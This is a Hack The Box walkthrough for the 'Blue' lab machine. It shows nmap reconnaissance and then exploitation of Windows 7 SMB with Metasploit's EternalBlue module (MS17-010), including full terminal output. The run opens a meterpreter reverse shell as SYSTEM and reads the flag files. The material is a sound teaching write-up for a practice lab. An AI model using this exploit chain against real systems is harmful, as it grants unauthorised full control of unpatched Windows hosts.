SYNOPSIS

Outlining the attack path demonstrated in this writeup is much easier through a picture rather than a description, since a picture is worth a thousand words.

Attack Path - Blue

The aim of this walkthrough is to provide help with the Blue machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.

It belongs to a series of tutorials that aim to help out with finishing the Beginner-Track challenges.

SETUP

There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.

Once our connection is taken care of, we spawn the target machine.

Additionally - even though not required - it is possible to set a local variable (only available in the current shell) containing our target host’s IP address. Once set, we can easily access it by prepending a $ to our variable name.

┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $rhost=<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $ echo $rhost 
<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $

We could use the unset command to remove it after we no longer need it.

┌─[][htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $unset rhost 
┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $

Finally, a very simple and basic file structure used throughout this writeup for this particular pentest:

  • 1_recon –> information gathering, enumeration and scanning, active/passive recon
  • 2_exploitation –> exploits, foothold, lateral movement
  • 3_post-exploitation –> privilege-escalation, lateral movement, persistence

Generating it is can be done by the following one-liner:

mkdir 1_recon; mkdir 2_exploitation; mkdir 3_post-exploitation

INFORMATION-GATHERING

As usual, we start out by a quick connection check

# shell command
ping -c 4 -n -R $rhost > connection-test.txt
# terminal interaction
┌─[eu-dedivip-1][10.10.14.20][htb-bluewalle@htb-ysgugzuhsh][~/blue/1_recon]
└──╼ []$ ping -c 4 -n -R $rhost > connection-test.txt
┌─[eu-dedivip-1][10.10.14.20][htb-bluewalle@htb-ysgugzuhsh][~/blue/1_recon]
└──╼ []$ cat connection-test.txt 
PING 10.129.174.73 (10.129.174.73) 56(124) bytes of data.
64 bytes from 10.129.174.73: icmp_seq=1 ttl=127 time=4.78 ms
64 bytes from 10.129.174.73: icmp_seq=2 ttl=127 time=3.46 ms
64 bytes from 10.129.174.73: icmp_seq=3 ttl=127 time=3.29 ms
64 bytes from 10.129.174.73: icmp_seq=4 ttl=127 time=3.08 ms

--- 10.129.174.73 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3004ms
rtt min/avg/max/mdev = 3.075/3.651/4.778/0.664 ms
┌─[eu-dedivip-1][10.10.14.20][htb-bluewalle@htb-ysgugzuhsh][~/blue/1_recon]
└──╼ []$

followed by the usual(version, default scripts, top-ports) tcp scan.

# shell command
nmap -sV -sC -on nmap-service-defscripts-topports-scan $rhost
# terminal interaction
┌─[eu-dedivip-1][10.10.14.20][htb-bluewalle@htb-ysgugzuhsh][~/blue/1_recon]
└──╼ []$ nmap -sV -sC -on nmap-service-defscripts-topports-scan $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-03 09:53 BST
Failed to resolve "nmap-service-defscripts-topports-scan".
Nmap scan report for 10.129.174.73
Host is up (0.068s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -19m57s, deviation: 34m37s, median: 0s
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-06-03T09:54:40+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   210: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-06-03T08:54:41
|_  start_date: 2023-06-03T08:32:42

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.93 seconds
┌─[eu-dedivip-1][10.10.14.20][htb-bluewalle@htb-ysgugzuhsh][~/blue/1_recon]
└──╼ []$

A couple of ports are reported open. One thing clearly stands out though:

  • 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)

or put simply, smb running on a quite old os.

Doing a quick internet search for it’s reported vulnerabilities lands us with - MS17-010 EternalBlue - which is the famous EternalBlue exploit. The same exploit that was used by the WannaCry ransomware a couple of years back… and exploits CVE-2017-0144.

Since there is already an exploit written for it in metasploit, so we simply continue from there on.

EXPLOITATION

Firing up metasploit

# shell command
msfconsole -q
# terminal interaction
┌─[eu-dedivip-1][10.10.14.20][htb-bluewalle@htb-ysgugzuhsh][~/blue/2_exploitation]
└──╼ []$ msfconsole -q
[msf](Jobs:0 Agents:0) >>

and searching for the aforementioned exploit

# msf command
search ms17-010 eternalblue
# terminal interaction
[msf](Jobs:0 Agents:0) >> search ms17-010 eternalblue

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

[msf](Jobs:0 Agents:0) >>

provides us with some options. The one we will be using here is the most common one for EternalBlue, which is available at - exploit/windows/smb/ms17_010_eternalblue -. Selecting it,

# msf command
use 0
[msf](Jobs:0 Agents:0) >> use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> 
# terminal interaction

and querying the module for information helps us verify, that the exploit is indeed appropriate for our current case.

# msf command
info
# terminal interaction
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> info

       Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
     Module: exploit/windows/smb/ms17_010_eternalblue
   Platform: Windows
       Arch: x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Average
  Disclosed: 2017-03-14

Provided by:
  Equation Group
  Shadow Brokers
  sleepya
  Sean Dillon <sean.dillon@risksense.com>
  Dylan Davis <dylan.davis@risksense.com>
  thelightcosine
  wvu <wvu@metasploit.com>
  agalway-r7
  cdelafuente-r7
  cdelafuente-r7
  agalway-r7

Available targets:
      Id  Name
      --  ----
  =>  0   Automatic Target
      1   Windows 7
      2   Windows Embedded Standard 7
      3   Windows Server 2008 R2
      4   Windows 8
      5   Windows 8.1
      6   Windows Server 2012
      7   Windows 10 Pro
      8   Windows 10 Enterprise Evaluation

Check supported:
  Yes

Basic options:
  Name           Current Setting  Required  Description
  ----           ---------------  --------  -----------
  RHOSTS                          yes       The target host(s), see https://docs.metasploit.
                                            com/docs/using-metasploit/basics/using-metasploi
                                            t.html
  RPORT          445              yes       The target port (TCP)
  SMBDomain                       no        (Optional) The Windows domain to use for authent
                                            ication. Only affects Windows Server 2008 R2, Wi
                                            ndows 7, Windows Embedded Standard 7 target mach
                                            ines.
  SMBPass                         no        (Optional) The password for the specified userna
                                            me
  SMBUser                         no        (Optional) The username to authenticate as
  VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Tar
                                            get. Only affects Windows Server 2008 R2, Window
                                            s 7, Windows Embedded Standard 7 target machines
                                            .
  VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only
                                            affects Windows Server 2008 R2, Windows 7, Windo
                                            ws Embedded Standard 7 target machines.

Payload information:
  Space: 2000

Description:
  This module is a port of the Equation Group ETERNALBLUE exploit, 
  part of the FuzzBunch toolkit released by Shadow Brokers. There is a 
  buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is 
  calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error 
  where a DWORD is subtracted into a WORD. The kernel pool is groomed 
  so that overflow is well laid-out to overwrite an SMBv1 buffer. 
  Actual RIP hijack is later completed in 
  srvnet!SrvNetWskReceiveComplete. This exploit, like the original may 
  not trigger 100% of the time, and should be run continuously until 
  triggered. It seems like the pool will get hot streaks and need a 
  cool down period before the shells rain in again. The module will 
  attempt to use Anonymous login, by default, to authenticate to 
  perform the exploit. If the user supplies credentials in the 
  SMBUser, SMBPass, and SMBDomain options it will use those instead. 
  On some systems, this module may cause system instability and 
  crashes, such as a BSOD or a reboot. This may be more likely with 
  some payloads.

References:
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
  https://nvd.nist.gov/vuln/detail/CVE-2017-0143
  https://nvd.nist.gov/vuln/detail/CVE-2017-0144
  https://nvd.nist.gov/vuln/detail/CVE-2017-0145
  https://nvd.nist.gov/vuln/detail/CVE-2017-0146
  https://nvd.nist.gov/vuln/detail/CVE-2017-0147
  https://nvd.nist.gov/vuln/detail/CVE-2017-0148
  https://github.com/RiskSense-Ops/MS17-010
  https://risksense.com/wp-content/uploads/2018/05/White-Paper_Eternal-Blue.pdf
  https://www.exploit-db.com/exploits/42030

Also known as:
  ETERNALBLUE


View the full module info with the info -d command.

[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >>

Great, since it fits, all that’s left is to properly configure it and then run it. Listing the module’s options should help us with the configuration.

# msf command
# terminal interaction
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://docs.metasploit
                                             .com/docs/using-metasploit/basics/using-metaspl
                                             oit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authen
                                             tication. Only affects Windows Server 2008 R2,
                                             Windows 7, Windows Embedded Standard 7 target m
                                             achines.
   SMBPass                         no        (Optional) The password for the specified usern
                                             ame
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Ta
                                             rget. Only affects Windows Server 2008 R2, Wind
                                             ows 7, Windows Embedded Standard 7 target machi
                                             nes.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only
                                              affects Windows Server 2008 R2, Windows 7, Win
                                             dows Embedded Standard 7 target machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process,
                                        none)
   LHOST     161.35.38.166    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >>

Looking at the default configuration, we can leave almost all the settings untouched, except of course, the target and local hosts settings.

Now, we could of course specify our target host’s OS too, setting it to - OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) - which was reported earlier during port scanning, but the module ships with automatic architecture and os discovery, so why bother.

# msf command
set rhosts $rhost
set lhost tun0
# terminal interaction
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set rhosts 10.129.174.73
rhosts => 10.129.174.73
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set lhost tun0
lhost => 10.10.14.20
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >>

Looks like everything is properly set up, so let’s run a quick check and see if our target is vulnerable or not.

# msf command
check
# terminal interaction
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> check

[*] 10.129.174.73:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.129.174.73:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.129.174.73:445     - Scanned 1 of 1 hosts (100% complete)
[+] 10.129.174.73:445 - The target is vulnerable.
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >>

It appears that our target is indeed vulnerable, so we run our exploit.

# msf command
run
# terminal interaction
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> run

[*] Started reverse TCP handler on 10.10.14.20:4444 
[*] 10.129.174.73:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.129.174.73:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.129.174.73:445     - Scanned 1 of 1 hosts (100% complete)
[+] 10.129.174.73:445 - The target is vulnerable.
[*] 10.129.174.73:445 - Connecting to target for exploitation.
[+] 10.129.174.73:445 - Connection established for exploitation.
[+] 10.129.174.73:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.129.174.73:445 - CORE raw buffer dump (42 bytes)
[*] 10.129.174.73:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.129.174.73:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.129.174.73:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.129.174.73:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.129.174.73:445 - Trying exploit with 12 Groom Allocations.
[*] 10.129.174.73:445 - Sending all but last fragment of exploit packet
[*] 10.129.174.73:445 - Starting non-paged pool grooming
[+] 10.129.174.73:445 - Sending SMBv2 buffers
[+] 10.129.174.73:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.129.174.73:445 - Sending final SMBv2 buffers.
[*] 10.129.174.73:445 - Sending last fragment of exploit packet!
[*] 10.129.174.73:445 - Receiving response from exploit packet
[+] 10.129.174.73:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.129.174.73:445 - Sending egg to corrupted connection.
[*] 10.129.174.73:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 10.129.174.73
[*] Meterpreter session 1 opened (10.10.14.20:4444 -> 10.129.174.73:49158) at 2023-06-03 10:49:25 +0100
[+] 10.129.174.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.129.174.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.129.174.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

(Meterpreter 1)(C:\Windows\system32) >

A meterpreter session was successfully opened and we have a shell connection to our target. As we can see, we are logged in with the NT AUTHORITY\SYSTEM account, which has the highest privileges on a a local windows system, it’s even more powerful that than the local admin account. Therefore, there is simply no need for any lateral movement or privilege escalation on our part, we already possess the privileges to access both of the flags.

# msf command
getuid
# terminal interaction
(Meterpreter 1)(C:\Windows\system32) > getuid
Server username: NT AUTHORITY\SYSTEM
(Meterpreter 1)(C:\Windows\system32) >

POST-EXPLOITATION

All that’s left for us now is to find and grab both the user and the root flags. We drop into the system command shell, since traversing the directories on a windows system might seem easier via cmd.

# msf command
shell
# terminal interaction
(Meterpreter 1)(C:\Windows\system32) > shell
Process 1128 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>

Once we identify the local user account - haris -, we head over to his Desktop and grab the user flag.

# msf command
shell
# terminal interaction
C:\Windows\system32> cd c:\users\
cd c:\users\

c:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE92-053B

 Directory of c:\Users

21/07/2017  07:56    <DIR>          .
21/07/2017  07:56    <DIR>          ..
21/07/2017  07:56    <DIR>          Administrator
14/07/2017  14:45    <DIR>          haris
12/04/2011  08:51    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)   2,694,017,024 bytes free

c:\Users>cd haris\desktop\
cd haris\desktop\

c:\Users\haris\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE92-053B

 Directory of c:\Users\haris\Desktop

24/12/2017  03:23    <DIR>          .
24/12/2017  03:23    <DIR>          ..
03/06/2023  09:33                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   2,694,017,024 bytes free

c:\Users\haris\Desktop>type user.txt
type user.txt
<user-flag>

c:\Users\haris\Desktop>

Grabbing the root flag is even easier, we already know that it is usually sitting on the Administrator’s Desktop.

# msf command
type c:\users\administrator\desktop\root.txt
# terminal interaction
c:\Users\haris\Desktop> cd c:\users\administrator\desktop
cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE92-053B

 Directory of c:\Users\Administrator\Desktop

24/12/2017  03:22    <DIR>          .
24/12/2017  03:22    <DIR>          ..
03/06/2023  09:33                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   2,694,017,024 bytes free

c:\Users\Administrator\Desktop>type root.txt
type root.txt
<root-flag>

c:\Users\Administrator\Desktop>

With this, we just successfully pwned the target machine, congratulations. All that’s left for us now is to submit the flags and then terminate the target box (if not terminated already)!